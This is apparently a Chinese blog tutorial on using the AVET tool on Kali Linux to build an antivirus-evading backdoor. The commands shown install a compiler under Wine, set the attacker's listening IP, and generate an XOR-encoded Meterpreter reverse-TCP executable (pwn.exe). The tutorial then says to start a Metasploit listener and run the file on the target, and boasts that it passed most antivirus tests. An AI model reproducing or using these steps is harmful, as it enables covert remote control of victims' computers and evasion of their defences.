Avet Tool Kali Linux后门免杀

资源：https://github.com/govolution/avet

1、在kali上下载：https://sourceforge.net/projects/tdm-gcc/

root@kali:/tmp# wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe

2、安装

root@kali:/tmp# wine tdm64-gcc-5.1.0-2.exe

接下来默认选项，继续安装。

3、克隆需要的库

root@kali:/tmp# git clone https://github.com/govolution/avet

4、开始搞事情

root@kali:/tmp# cd avet/
root@kali:/tmp/avet# ls

win32就是指32位的，win64就是指64位的。一般情况，32位的比较保险一些。但不排除意外。

root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh 

lhost=192.168.111.130 #这个ip是你自己本机的ip，就是接受shell用的。

root@kali:/tmp/avet/build# cd ..

root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh

。。。然后报错了，有点懵：
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
   shellcode = buf;
               ^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in

————————————————
更新：2017年8月1日 09:35:40
有网友提到：

gcc -o make_avet make_avet.c

可以解决上面这个报错的问题。
————————————————
接下来就是用msf开启监听。在目标执行生成的那个exe文件，默认名字叫做pwn.exe，这个文件杀毒测试以后，基本都通过了。

要是有大佬做成功了，请发表一下看法。
附上视频讲解：传送门
更多资源：https://www.blackhat.com/asia-17/